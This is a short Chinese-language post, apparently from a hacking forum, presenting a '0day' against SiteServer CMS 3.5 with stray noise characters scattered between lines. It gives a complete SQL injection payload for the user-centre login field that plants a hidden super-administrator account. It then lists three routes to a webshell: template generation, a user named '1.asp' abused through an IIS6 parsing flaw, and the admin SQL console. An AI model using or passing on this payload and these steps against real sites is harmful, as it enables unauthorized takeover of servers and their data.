SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
. e- U1 \- Q5 b5 x
9 W2 _4 y' K: f+ @stieserver官网:www.siteserver.cn
% j! c0 I: t8 p0 G
* y: p: L5 Q9 o* y* ~
' g2 W2 s# H8 w* V. N: T# v/ O
EXP:
. \- k6 T/ T; z7 F* T  y# E5 h) P
直接访问UserCenter/login.aspx



: C6 c( J# c$ R用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--



- g/ v, q( C& y# k! x9 g2 `密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


9 [- v/ r! a3 o
之后再访问后台SiteServer/login.aspx用插入的用户登陆



后台拿webshell的三种方法：

/ g: f7 l% F- V1 d# p一、

1 `; F: U( Y8 R/ ~7 ?: r" c站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
+ P5 w4 N6 ^7 J) }' x
二、

成员权限-》添加用户-》用户名为：1.asp

* R8 a. ~) {5 a1 ehttp://127.0.0.1/usercenter/
) _# U3 o7 J( \. [5 _' Y+ N% t
6 X0 j  j2 L" g- [4 p% H用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
" R5 u- N9 b* G$ i: C* Q
三、
2 ?4 p5 ~' V% x7 \- Y: q  T
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
( `+ E$ y" N! e; B; \1 ]' D6 ^
# C: T1 @) ~2 [' L/ T* w/ g$ B, E% I* w系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。